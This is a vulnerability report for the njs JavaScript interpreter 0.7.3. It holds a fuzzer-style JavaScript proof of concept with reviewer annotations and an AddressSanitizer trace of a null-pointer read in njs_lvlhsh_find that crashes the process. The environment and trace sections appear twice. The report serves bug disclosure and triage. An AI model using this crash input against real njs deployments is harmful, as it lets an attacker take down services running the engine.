OS : Linux leanderwang-LC2 5.13.0-30-generic #33~20.04.1-Ubuntu SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
PoC
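/*
 * Reproducer from the report, with the whitespace and line breaks that the
 * page rendering dropped put back (as rendered, `function`/`var`/`new` were
 * fused with the following identifier and the `//key point` comment
 * swallowed the rest of the program).
 *
 * Reported against njs 0.7.3 (commit f65981b) built with -fsanitize=address.
 * The reported outcome is an AddressSanitizer SEGV: a READ of address 0x0 in
 * njs_lvlhsh_find (src/njs_lvlhsh.c:176), i.e. a null-pointer read that
 * aborts the interpreter process.
 */
function main() {
    var v4 = [1.0];

    // key point (reporter's marker): v4 holds one element and this write
    // lands at index 64240, far past its end.
    // NOTE(review): presumably this changes how njs stores the array
    // internally; the report does not say so. Confirm against the engine.
    v4[64240] = 1;

    var v10 = new Int8Array();

    // splice() is given a typed array as its start index and a spread of the
    // number 4096 as the items to insert; v12 is whatever splice returns.
    var v12 = v4.splice(v10, 5.0, ...4096);

    // v27 and v43 are plain template-literal strings. Nothing in this script
    // evaluates them, so the code written inside them never runs.
    var v27 = ` function v28(v29) { var v34 = {"__proto__":v27}; } `;

    // NOTE(review): this is the only typed-array constructor call that takes
    // arguments, so it is presumably the njs_typed_array_constructor frame in
    // the trace (njs_typed_array_alloc -> njs_value_to_number ->
    // njs_value_to_primitive -> njs_object_property -> njs_lvlhsh_find).
    // For triage, check what object reaches njs_value_to_primitive with a
    // null hash and whether njs_typed_array_alloc validates its argument
    // before converting it to a number.
    var v42 = new Int8Array(v12, 1, v12, 1, 1);

    var v43 = ` var v44 = Uint16Array.isExtensible(1,1,v43,1); `;
}

main();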
Stack dump
AddressSanitizer:DEADLYSIGNAL
==770430==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55f6511ff5e8 bp 0x7fff6a7876f0 sp 0x7fff6a7876b0 T0)
==770430==The signal is caused by a READ memory access.
==770430==Hint: address points to the zero page.
#0 0x55f6511ff5e7 in njs_lvlhsh_find src/njs_lvlhsh.c:176
#1 0x55f65124f2af in njs_object_property src/njs_object_prop.c:59
#2 0x55f65120a883 in njs_value_to_primitive src/njs_value.c:159
#3 0x55f65131a8c2 in njs_value_to_number src/njs_value_conversion.h:18
#4 0x55f65131a8c2 in njs_typed_array_alloc src/njs_typed_array.c:171
#5 0x55f65131e4c8 in njs_typed_array_constructor src/njs_typed_array.c:229
#6 0x55f65127461c in njs_function_native_call src/njs_function.c:739
#7 0x55f65121a0fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#8 0x55f651273aba in njs_function_lambda_call src/njs_function.c:703
#9 0x55f65121a0fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#10 0x55f6512140ba in njs_vm_start src/njs_vm.c:553
#11 0x55f6511fd3f8 in njs_process_script src/njs_shell.c:890
#12 0x55f6511fdebf in njs_process_file src/njs_shell.c:619
#13 0x55f6511ff21f in main src/njs_shell.c:303
#14 0x7fb4e6e39082 in __libc_start_main ../csu/libc-start.c:308
#15 0x55f6511fac4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/njs_lvlhsh.c:176 in njs_lvlhsh_find
==770430==ABORTING
Environment
OS : Linux leanderwang-LC2 5.13.0-30-generic #33~20.04.1-Ubuntu SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
PoC
Stack dump
AddressSanitizer:DEADLYSIGNAL
==770430==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55f6511ff5e8 bp 0x7fff6a7876f0 sp 0x7fff6a7876b0 T0)
==770430==The signal is caused by a READ memory access.
==770430==Hint: address points to the zero page.
#0 0x55f6511ff5e7 in njs_lvlhsh_find src/njs_lvlhsh.c:176
#1 0x55f65124f2af in njs_object_property src/njs_object_prop.c:59
#2 0x55f65120a883 in njs_value_to_primitive src/njs_value.c:159
#3 0x55f65131a8c2 in njs_value_to_number src/njs_value_conversion.h:18
#4 0x55f65131a8c2 in njs_typed_array_alloc src/njs_typed_array.c:171
#5 0x55f65131e4c8 in njs_typed_array_constructor src/njs_typed_array.c:229
#6 0x55f65127461c in njs_function_native_call src/njs_function.c:739
#7 0x55f65121a0fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#8 0x55f651273aba in njs_function_lambda_call src/njs_function.c:703
#9 0x55f65121a0fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#10 0x55f6512140ba in njs_vm_start src/njs_vm.c:553
#11 0x55f6511fd3f8 in njs_process_script src/njs_shell.c:890
#12 0x55f6511fdebf in njs_process_file src/njs_shell.c:619
#13 0x55f6511ff21f in main src/njs_shell.c:303
#14 0x7fb4e6e39082 in __libc_start_main ../csu/libc-start.c:308
#15 0x55f6511fac4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/njs_lvlhsh.c:176 in njs_lvlhsh_find
==770430==ABORTING
Credit
xmzyshypnc(@xmzyshypnc) P1umer(@P1umer)